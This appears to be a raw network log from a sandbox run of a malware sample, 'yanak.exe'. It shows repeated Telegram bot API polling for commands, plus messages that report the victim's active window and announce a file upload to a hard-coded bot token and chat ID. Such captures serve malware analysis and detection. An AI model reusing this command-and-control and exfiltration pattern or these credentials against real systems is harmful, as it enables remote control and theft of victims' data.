GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:54 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:55 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:56 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:57 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:58 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:59 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:00 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:01 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:02 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:03 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:05 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:06 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:07 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:08 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:09 GMT
Content-Type: application/json
Content-Length: 357
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%92%AC%20Active%20window:%20Task%20Manager

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%92%AC%20Active%20window:%20Task%20Manager HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:09 GMT
Content-Type: application/json
Content-Length: 276
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:10 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:11 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:12 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:13 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:14 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:15 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:16 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:17 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:18 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:20 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:22 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:23 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:24 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:25 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:26 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293343

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293343 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:27 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293344

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293344 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:28 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293345

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293345 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:29 GMT
Content-Type: application/json
Content-Length: 357
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%83%20Uploading%20file...

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%83%20Uploading%20file... HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:29 GMT
Content-Type: application/json
Content-Length: 266
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:30 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:31 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:32 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:33 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:34 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

